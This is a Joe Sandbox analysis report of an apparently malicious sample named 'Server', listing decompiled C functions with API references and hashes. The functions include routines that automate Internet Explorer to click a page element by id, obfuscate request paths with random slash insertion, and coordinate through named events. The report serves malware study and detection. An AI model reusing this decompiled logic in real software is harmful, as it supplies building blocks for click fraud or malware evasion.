            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: wsprintf$Heap$Free$AllocateCountTick
            • String ID: Uet
            • API String ID: 1307794992-2766386878
            • Opcode ID: d71a194a62173cb448627e293c3652cae7a1b5d51d4095bec01e975fdd655608
            • Instruction ID: 2ffd4b3fa76b3c3815243e92686653584105cd33536326e0eae9c3bf512f6779
            • Opcode Fuzzy Hash: d71a194a62173cb448627e293c3652cae7a1b5d51d4095bec01e975fdd655608
            • Instruction Fuzzy Hash: 13312B71A00318AFCB11DFA4D988BDA37BDFB08355F218463E905A7210DB38A55CDFA1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 46%
            			E02026CDF(intOrPtr* __eax) {
            				void* _v8;
            				WCHAR* _v12;
            				void* _v16;
            				char _v20;
            				void* _v24;
            				intOrPtr _v28;
            				void* _v32;
            				intOrPtr _v40;
            				short _v48;
            				intOrPtr _v56;
            				short _v64;
            				intOrPtr* _t54;
            				intOrPtr* _t56;
            				intOrPtr _t57;
            				intOrPtr* _t58;
            				intOrPtr* _t60;
            				void* _t61;
            				intOrPtr* _t63;
            				intOrPtr* _t65;
            				short _t67;
            				intOrPtr* _t68;
            				intOrPtr* _t70;
            				intOrPtr* _t72;
            				intOrPtr* _t75;
            				intOrPtr* _t77;
            				intOrPtr _t79;
            				intOrPtr* _t83;
            				intOrPtr* _t87;
            				intOrPtr _t103;
            				intOrPtr _t109;
            				void* _t118;
            				void* _t122;
            				void* _t123;
            				intOrPtr _t130;
            
            				_t123 = _t122 - 0x3c;
            				_push( &_v8);
            				_push(__eax);
            				_t118 =  *((intOrPtr*)( *__eax + 0x48))(); // vtable slot 18 (0x48/4) with (this, &_v8): IWebBrowser2::get_Document. The slot-to-method names in this listing are the editor's reading of the vtable offsets against the interfaces whose IIDs the code itself queries below
            				if(_t118 >= 0) {
            					_t54 = _v8;
            					_t103 =  *0x202a348; // 0xc7d5a8
            					_t5 = _t103 + 0x202b038; // 0x3050f485: first DWORD of IID_IHTMLDocument3 {3050F485-98B5-11CF-BB82-00AA00BDCE0B}
            					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32); // slot 0: QueryInterface(IID_IHTMLDocument3, &_v32) on the document
            					_t56 = _v8;
            					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56); // slot 2: Release the IDispatch document pointer
            					if(_t118 >= 0) {
            						__imp__#2(0x2029284); // OLEAUT32 ordinal 2 = SysAllocString(tag name at 0x2029284)
            						_v28 = _t57;
            						if(_t57 == 0) {
            							_t118 = 0x8007000e; // E_OUTOFMEMORY
            						} else {
            							_t60 = _v32;
            							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24); // slot 47 (0xbc/4): IHTMLDocument3::getElementsByTagName(tag, &collection)
            							_t87 = __imp__#6; // OLEAUT32 ordinal 6 = SysFreeString
            							_t118 = _t61;
            							if(_t118 >= 0) {
            								_t63 = _v24;
            								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20); // slot 9 (0x24/4): IHTMLElementCollection::get_length(&_v20)
            								if(_t118 >= 0) {
            									_t130 = _v20;
            									if(_t130 != 0) {
            										_t67 = 3; // two 16-byte VARIANTs on the stack, vt = 3 (VT_I4); _v40 is the running index handed to item() below
            										_v64 = _t67;
            										_v48 = _t67;
            										_v56 = 0;
            										_v40 = 0;
            										if(_t130 > 0) {
            											while(1) {
            												_t68 = _v24;
            												asm("movsd"); // the eight movsd copy both VARIANTs (name, index) by value onto the stack for item()
            												asm("movsd");
            												asm("movsd");
            												asm("movsd");
            												_t123 = _t123;
            												asm("movsd");
            												asm("movsd");
            												asm("movsd");
            												asm("movsd");
            												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8); // slot 11 (0x2c/4): IHTMLElementCollection::item(name, index, &IDispatch)
            												if(_t118 < 0) {
            													goto L16;
            												}
            												_t70 = _v8;
            												_t109 =  *0x202a348; // 0xc7d5a8
            												_t28 = _t109 + 0x202b0e4; // 0x3050f1ff: first DWORD of IID_IHTMLElement {3050F1FF-98B5-11CF-BB82-00AA00BDCE0B}
            												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16); // QueryInterface(IID_IHTMLElement, &_v16)
            												if(_t118 >= 0) {
            													_t75 = _v16;
            													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12); // slot 13 (0x34/4): IHTMLElement::get_id(&_v12)
            													if(_t118 >= 0 && _v12 != 0) {
            														_t79 =  *0x202a348; // 0xc7d5a8
            														_t33 = _t79 + 0x202b078; // 0x76006f = L"ov": first two UTF-16 characters of the expected element id, the rest is not in the dump
            														if(lstrcmpW(_v12, _t33) == 0) { // case-sensitive compare of the element id against that string
            															_t83 = _v16;
            															 *((intOrPtr*)( *_t83 + 0x114))(_t83); // slot 69 (0x114/4): IHTMLElement::click() on the matching element
            														}
            														 *_t87(_v12); // SysFreeString(id)
            													}
            													_t77 = _v16;
            													 *((intOrPtr*)( *_t77 + 8))(_t77);
            												}
            												_t72 = _v8;
            												 *((intOrPtr*)( *_t72 + 8))(_t72);
            												_v40 = _v40 + 1;
            												if(_v40 < _v20) {
            													continue;
            												}
            												goto L16;
            											}
            										}
            									}
            								}
            								L16:
            								_t65 = _v24;
            								 *((intOrPtr*)( *_t65 + 8))(_t65);
            							}
            							 *_t87(_v28);
            						}
            						_t58 = _v32;
            						 *((intOrPtr*)( *_t58 + 8))(_t58);
            					}
            				}
            				return _t118;
            			}

            APIs
            • SysAllocString.OLEAUT32(02029284), ref: 02026D2F
            • lstrcmpW.KERNEL32(00000000,0076006F), ref: 02026E10
            • SysFreeString.OLEAUT32(00000000), ref: 02026E29
            • SysFreeString.OLEAUT32(?), ref: 02026E58
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: String$Free$Alloclstrcmp
            • String ID:
            • API String ID: 1885612795-0
            • Opcode ID: 41703b3b282840c803e3ef35dd79b4ed07d138a7f8d0afd50c0ca1878976726c
            • Instruction ID: aa206e021ce9df034bc32d25d737e2b9d99c117eb3470bcdb7a5c2d5b176ea97
            • Opcode Fuzzy Hash: 41703b3b282840c803e3ef35dd79b4ed07d138a7f8d0afd50c0ca1878976726c
            • Instruction Fuzzy Hash: 7D518E71D00619EFCF11DFA8C4889EEB7BAFF88704B244595E915EB210DB32AD45CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SysAllocString.OLEAUT32(?), ref: 020259B8
            • SysFreeString.OLEAUT32(00000000), ref: 02025A9D
              • Part of subcall function 02026CDF: SysAllocString.OLEAUT32(02029284), ref: 02026D2F
            • SafeArrayDestroy.OLEAUT32(00000000), ref: 02025AF0
            • SysFreeString.OLEAUT32(00000000), ref: 02025AFF
              • Part of subcall function 020277E3: Sleep.KERNEL32(000001F4), ref: 0202782B
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: String$AllocFree$ArrayDestroySafeSleep
            • String ID:
            • API String ID: 3193056040-0
            • Opcode ID: c6a239c2e6ca93b75e55981456a794223d29522cfc26f6aba50eee807113f71a
            • Instruction ID: 1b847cd9615451761df979b5415c07739a4158b5864f4519b91e33d59bfd8fb3
            • Opcode Fuzzy Hash: c6a239c2e6ca93b75e55981456a794223d29522cfc26f6aba50eee807113f71a
            • Instruction Fuzzy Hash: A8516F35900719AFDB16DFA8C884ADEB7B6FF88704F25882AE505DB210DB35DD09CB50
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 85%
            			E02024781(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				signed int _v16;
            				void _v156;
            				void _v428;
            				void* _t55;
            				unsigned int _t56;
            				signed int _t66;
            				signed int _t74;
            				void* _t76;
            				signed int _t79;
            				void* _t81;
            				void* _t92;
            				void* _t96;
            				signed int* _t99;
            				signed int _t101;
            				signed int _t103;
            				void* _t107;
            
            				_t92 = _a12;
            				_t101 = __eax;
            				_t55 = E020261EF(_a16, _t92);
            				_t79 = _t55;
            				if(_t79 == 0) {
            					L18:
            					return _t55;
            				}
            				_t56 =  *(_t92 + _t79 * 4 - 4);
            				_t81 = 0;
            				_t96 = 0x20;
            				if(_t56 == 0) {
            					L4:
            					_t97 = _t96 - _t81;
            					_v12 = _t96 - _t81;
            					E02026725(_t79,  &_v428);
            					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E02027477(_t101,  &_v428, _a8, _t96 - _t81);
            					E02027477(_t79,  &_v156, _a12, _t97);
            					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
            					_t66 = E02026725(_t101, 0x202a1d0);
            					_t103 = _t101 - _t79;
            					_a8 = _t103;
            					if(_t103 < 0) {
            						L17:
            						E02026725(_a16, _a4);
            						E02027894(_t79,  &_v428, _a4, _t97);
            						memset( &_v428, 0, 0x10c);
            						_t55 = memset( &_v156, 0, 0x84);
            						goto L18;
            					}
            					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
            					do {
            						if(_v8 != 0xffffffff) {
            							_push(1);
            							_push(0);
            							_push(0);
            							_push( *_t99);
            							L020282DA();
            							_t74 = _t66 +  *(_t99 - 4);
            							asm("adc edx, esi");
            							_push(0);
            							_push(_v8 + 1);
            							_push(_t92);
            							_push(_t74);
            							L020282D4();
            							if(_t92 > 0 || _t74 > 0xffffffff) {
            								_t74 = _t74 | 0xffffffff;
            								_v16 = _v16 & 0x00000000;
            							}
            						} else {
            							_t74 =  *_t99;
            						}
            						_t106 = _t107 + _a8 * 4 - 0x1a8;
            						_a12 = _t74;
            						_t76 = E02025F09(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
            						while(1) {
            							 *_t99 =  *_t99 - _t76;
            							if( *_t99 != 0) {
            								goto L14;
            							}
            							L13:
            							_t92 =  &_v156;
            							if(E02026E71(_t79, _t92, _t106) < 0) {
            								break;
            							}
            							L14:
            							_a12 = _a12 + 1;
            							_t76 = E020210A0(_t79,  &_v156, _t106, _t106);
            							 *_t99 =  *_t99 - _t76;
            							if( *_t99 != 0) {
            								goto L14;
            							}
            							goto L13;
            						}
            						_a8 = _a8 - 1;
            						_t66 = _a12;
            						_t99 = _t99 - 4;
            						 *(0x202a1d0 + _a8 * 4) = _t66;
            					} while (_a8 >= 0);
            					_t97 = _v12;
            					goto L17;
            				}
            				while(_t81 < _t96) {
            					_t81 = _t81 + 1;
            					_t56 = _t56 >> 1;
            					if(_t56 != 0) {
            						continue;
            					}
            					goto L4;
            				}
            				goto L4;
            			}

            APIs
            • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 02024834
            • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 0202484A
            • memset.NTDLL ref: 020248F3
            • memset.NTDLL ref: 02024909
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: memset$_allmul_aulldiv
            • String ID:
            • API String ID: 3041852380-0
            • Opcode ID: 69bb8baa51ecd39a9ebab3ccefeb957d78d27023ffb835e445bcf3ced2c847fc
            • Instruction ID: 367414c7f5dcfe95f11f6346b2c9c02bd5a45f50feb2197fb1ee49f3c56d7b8a
            • Opcode Fuzzy Hash: 69bb8baa51ecd39a9ebab3ccefeb957d78d27023ffb835e445bcf3ced2c847fc
            • Instruction Fuzzy Hash: 6A418271A00369AFDB119F68DC80BEE77B5EF45310F00456AE919A7280EB70AA58DF50
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 87%
            			E020249D0(signed int _a4, signed int* _a8) {
            				void* __ecx;
            				void* __edi;
            				signed int _t6;
            				intOrPtr _t8;
            				intOrPtr _t12;
            				short* _t19;
            				void* _t25;
            				signed int* _t28;
            				CHAR* _t30;
            				long _t31;
            				intOrPtr* _t32;
            
            				_t6 =  *0x202a310; // 0xd448b889
            				_t32 = _a4;
            				_a4 = _t6 ^ 0x109a6410;
            				_t8 =  *0x202a348; // 0xc7d5a8
            				_t3 = _t8 + 0x202b7b4; // 0x61636f4c
            				_t25 = 0;
            				_t30 = E020274EC(_t3, 1);
            				if(_t30 != 0) {
            					_t25 = CreateEventA(0x202a34c, 1, 0, _t30);
            					E020261DA(_t30);
            				}
            				_t12 =  *0x202a2fc; // 0x2000000a
            				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E020230D5() != 0) {
            					L12:
            					_t28 = _a8;
            					if(_t28 != 0) {
            						 *_t28 =  *_t28 | 0x00000001;
            					}
            					_t31 = E020237DF(_t32, 0);
            					if(_t31 == 0 && _t25 != 0) {
            						_t31 = WaitForSingleObject(_t25, 0x4e20);
            					}
            					if(_t28 != 0 && _t31 != 0) {
            						 *_t28 =  *_t28 & 0xfffffffe;
            					}
            					goto L20;
            				} else {
            					_t19 =  *0x202a124( *_t32, 0x20);
            					if(_t19 != 0) {
            						 *_t19 = 0;
            						_t19 = _t19 + 2;
            					}
            					_t31 = E020223C4(0,  *_t32, _t19, 0);
            					if(_t31 == 0) {
            						if(_t25 == 0) {
            							L22:
            							return _t31;
            						}
            						_t31 = WaitForSingleObject(_t25, 0x4e20);
            						if(_t31 == 0) {
            							L20:
            							if(_t25 != 0) {
            								CloseHandle(_t25);
            							}
            							goto L22;
            						}
            					}
            					goto L12;
            				}
            			}

            APIs
              • Part of subcall function 020274EC: lstrlen.KERNEL32(00000005,00000000,43175AC3,00000027,00000000,02CA9E18,00000000,?,?,43175AC3,00000005,0202A00C,4D283A53,?,?), ref: 02027522
              • Part of subcall function 020274EC: lstrcpy.KERNEL32(00000000,00000000), ref: 02027546
              • Part of subcall function 020274EC: lstrcat.KERNEL32(00000000,00000000), ref: 0202754E
            • CreateEventA.KERNEL32(0202A34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,02026A95,?,?,?), ref: 02024A11
              • Part of subcall function 020261DA: RtlFreeHeap.NTDLL(00000000,00000000,02026383,00000000,?,00000000,00000000), ref: 020261E6
            • WaitForSingleObject.KERNEL32(00000000,00004E20,02026A95,00000000,00000000,?,00000000,?,02026A95,?,?,?), ref: 02024A71
            • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,02026A95,?,?,?), ref: 02024A9F
            • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,02026A95,?,?,?), ref: 02024AB7
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
            • String ID:
            • API String ID: 73268831-0
            • Opcode ID: 51692632fde9a202c153043e21986782e693403f84be144366c8e0d29c09b3bb
            • Instruction ID: f0aa9c2e1f3e0d534848ec538a453fc7467984274e0f68e8c9706d2061ce8030
            • Opcode Fuzzy Hash: 51692632fde9a202c153043e21986782e693403f84be144366c8e0d29c09b3bb
            • Instruction Fuzzy Hash: 6C21B632A403755BC7729A689C84AAF73E9FB48719F260627FE55DB140DB24C80CBB58
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 39%
            			E020269E6(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
            				intOrPtr _v12;
            				void* _v16;
            				void* _v28;
            				char _v32;
            				void* __esi;
            				void* _t29;
            				void* _t38;
            				signed int* _t39;
            				void* _t40;
            
            				_t36 = __ecx;
            				_v32 = 0;
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				_v12 = _a4;
            				_t38 = E02022A3D(__ecx,  &_v32);
            				if(_t38 != 0) {
            					L12:
            					_t39 = _a8;
            					L13:
            					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
            						_t23 =  &(_t39[1]);
            						if(_t39[1] != 0) {
            							E020228B3(_t23);
            						}
            					}
            					return _t38;
            				}
            				if(E02026ADC(0x40,  &_v16) != 0) {
            					_v16 = 0;
            				}
            				_t40 = CreateEventA(0x202a34c, 1, 0,  *0x202a3e4);
            				if(_t40 != 0) {
            					SetEvent(_t40);
            					Sleep(0xbb8);
            					CloseHandle(_t40);
            				}
            				_push( &_v32);
            				if(_a12 == 0) {
            					_t29 = E02025704(_t36);
            				} else {
            					_push(0);
            					_push(0);
            					_push(0);
            					_push(0);
            					_push(0);
            					_t29 = E02024C94(_t36);
            				}
            				_t41 = _v16;
            				_t38 = _t29;
            				if(_v16 != 0) {
            					E02027220(_t41);
            				}
            				if(_t38 != 0) {
            					goto L12;
            				} else {
            					_t39 = _a8;
            					_t38 = E020249D0( &_v32, _t39);
            					goto L13;
            				}
            			}

            APIs
            • CreateEventA.KERNEL32(0202A34C,00000001,00000000,00000040,?,?,746AF710,00000000,746AF730), ref: 02026A37
            • SetEvent.KERNEL32(00000000), ref: 02026A44
            • Sleep.KERNEL32(00000BB8), ref: 02026A4F
            • CloseHandle.KERNEL32(00000000), ref: 02026A56
              • Part of subcall function 02025704: WaitForSingleObject.KERNEL32(00000000,?,?,?,02026A76,?,02026A76,?,?,?,?,?,02026A76,?), ref: 020257DE
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: Event$CloseCreateHandleObjectSingleSleepWait
            • String ID:
            • API String ID: 2559942907-0
            • Opcode ID: 96a7157deee247dfd3d7f19e861a089d6fbdeafbd701a4bef05b91e25cd639e2
            • Instruction ID: b84fbadac6fffc8a4fd49b9d64895b49cf552d6e2c6ed5e00225fcc0537277f2
            • Opcode Fuzzy Hash: 96a7157deee247dfd3d7f19e861a089d6fbdeafbd701a4bef05b91e25cd639e2
            • Instruction Fuzzy Hash: B2215372D00339AFDB21AFE498849EE77EDAB04314B158427EA11A7100D736998D9FA0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 78%
            			E02024461(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
            				intOrPtr _v8;
            				void* _v12;
            				void* _v16;
            				intOrPtr _t26;
            				intOrPtr* _t28;
            				intOrPtr _t31;
            				intOrPtr* _t32;
            				void* _t39;
            				int _t46;
            				intOrPtr* _t47;
            				int _t48;
            
            				_t47 = __eax;
            				_push( &_v12);
            				_push(__eax);
            				_t39 = 0;
            				_t46 = 0;
            				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
            				_v8 = _t26;
            				if(_t26 < 0) {
            					L13:
            					return _v8;
            				}
            				if(_v12 == 0) {
            					Sleep(0xc8);
            					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
            				}
            				if(_v8 >= _t39) {
            					_t28 = _v12;
            					if(_t28 != 0) {
            						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
            						_v8 = _t31;
            						if(_t31 >= 0) {
            							_t46 = lstrlenW(_v16);
            							if(_t46 != 0) {
            								_t46 = _t46 + 1;
            								_t48 = _t46 + _t46;
            								_t39 = E020233DC(_t48);
            								if(_t39 == 0) {
            									_v8 = 0x8007000e;
            								} else {
            									memcpy(_t39, _v16, _t48);
            								}
            								__imp__#6(_v16);
            							}
            						}
            						_t32 = _v12;
            						 *((intOrPtr*)( *_t32 + 8))(_t32);
            					}
            					 *_a4 = _t39;
            					 *_a8 = _t46 + _t46;
            				}
            				goto L13;
            			}

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: FreeSleepStringlstrlenmemcpy
            • String ID:
            • API String ID: 1198164300-0
            • Opcode ID: b9820373a85907152d2fbb52b53cedcc156daaf0439571ac874a83afb0fc041c
            • Instruction ID: 862f86f7e2f7c2915423695b1eb42475a558eeb23fef041512b275789d2b7555
            • Opcode Fuzzy Hash: b9820373a85907152d2fbb52b53cedcc156daaf0439571ac874a83afb0fc041c
            • Instruction Fuzzy Hash: 08213E75900329EFCB11DFA4D9849DEBBF9FF48314B20856AE94597200EB34DA09DF50
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 68%
            			E02022708(unsigned int __eax, void* __ecx) {
            				void* _v8;
            				void* _v12;
            				signed int _t21;
            				signed short _t23;
            				char* _t27;
            				void* _t29;
            				void* _t30;
            				unsigned int _t33;
            				void* _t37;
            				unsigned int _t38;
            				void* _t41;
            				void* _t42;
            				int _t45;
            				void* _t46;
            
            				_t42 = __eax;
            				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
            				_t38 = __eax;
            				_t30 = RtlAllocateHeap( *0x202a2d8, 0, (__eax >> 3) + __eax + 1);
            				_v12 = _t30;
            				if(_t30 != 0) {
            					_v8 = _t42;
            					do {
            						_t33 = 0x18;
            						if(_t38 <= _t33) {
            							_t33 = _t38;
            						}
            						_t21 =  *0x202a2f0; // 0xa0551a04
            						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
            						 *0x202a2f0 = _t23;
            						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
            						memcpy(_t30, _v8, _t45);
            						_v8 = _v8 + _t45;
            						_t27 = _t30 + _t45;
            						_t38 = _t38 - _t45;
            						_t46 = _t46 + 0xc;
            						 *_t27 = 0x2f;
            						_t13 = _t27 + 1; // 0x1
            						_t30 = _t13;
            					} while (_t38 > 8);
            					memcpy(_t30, _v8, _t38 + 1);
            				}
            				return _v12;
            			}

            APIs
            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02026708,00000000,?,76B5C740,02023ECE,00000000,02CA9600), ref: 02022713
            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0202272B
            • memcpy.NTDLL(00000000,02CA9600,-00000008,?,?,?,02026708,00000000,?,76B5C740,02023ECE,00000000,02CA9600), ref: 0202276F
            • memcpy.NTDLL(00000001,02CA9600,00000001,02023ECE,00000000,02CA9600), ref: 02022790
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: memcpy$AllocateHeaplstrlen
            • String ID:
            • API String ID: 1819133394-0
            • Opcode ID: 9c4d2329331fe9ccd1a8f9c05a9bbd12471309d7c52c62826c5c105b0b6823f3
            • Instruction ID: fda6a28351883be965607d3bc19264c1ebc50b0eb05dbca35ddc111d1921000d
            • Opcode Fuzzy Hash: 9c4d2329331fe9ccd1a8f9c05a9bbd12471309d7c52c62826c5c105b0b6823f3
            • Instruction Fuzzy Hash: 00110672A00328AFD7248AA9DC84D9E7BFEEB90360B250177F804D7140EB759E1897A0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 64%
            			E020223C4(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
            				intOrPtr _v36;
            				intOrPtr _v44;
            				intOrPtr _v48;
            				intOrPtr _v52;
            				void _v60;
            				char _v64;
            				intOrPtr _t18;
            				intOrPtr _t19;
            				intOrPtr _t26;
            				intOrPtr _t27;
            				long _t28;
            
            				_t27 = __edi;
            				_t26 = _a8;
            				_t28 = E02023A63(_a4, _t26, __edi);
            				if(_t28 != 0) {
            					memset( &_v60, 0, 0x38);
            					_t18 =  *0x202a348; // 0xc7d5a8
            					_t28 = 0;
            					_v64 = 0x3c;
            					if(_a12 == 0) {
            						_t7 = _t18 + 0x202b50c; // 0x70006f
            						_t19 = _t7;
            					} else {
            						_t6 = _t18 + 0x202b8d8; // 0x750072
            						_t19 = _t6;
            					}
            					_v52 = _t19;
            					_push(_t28);
            					_v48 = _a4;
            					_v44 = _t26;
            					_v36 = _t27;
            					E02025B56();
            					_push( &_v64);
            					if( *0x202a100() == 0) {
            						_t28 = GetLastError();
            					}
            					_push(1);
            					E02025B56();
            				}
            				return _t28;
            			}

            Addresses (column detached from the C-code listing): 0x020223c4 to 0x02022447

            APIs
              • Part of subcall function 02023A63: SysAllocString.OLEAUT32(00000000), ref: 02023ABD
              • Part of subcall function 02023A63: SysAllocString.OLEAUT32(0070006F), ref: 02023AD1
              • Part of subcall function 02023A63: SysAllocString.OLEAUT32(00000000), ref: 02023AE3
            • memset.NTDLL ref: 020223E7
            • GetLastError.KERNEL32 ref: 02022433
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: AllocString$ErrorLastmemset
            • String ID: <$@MetNet
            • API String ID: 3736384471-3263418992
            • Opcode ID: 35e023a102302c9e73a2e6737dc87c91a8898230302031882e9bfa6aaa81ed5d
            • Instruction ID: 1c059124468679c0d7aee99799e1df2d9de019cb3076f5c0e7ea623b7d477dbe
            • Opcode Fuzzy Hash: 35e023a102302c9e73a2e6737dc87c91a8898230302031882e9bfa6aaa81ed5d
            • Instruction Fuzzy Hash: 6E011B71D00328AFCB11EFA9D884BCEBBF8BB08744F414427ED04A7240E77499489B94
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,01FC1C63), ref: 01FC1FDE
            • GetVersion.KERNEL32(?,01FC1C63), ref: 01FC1FED
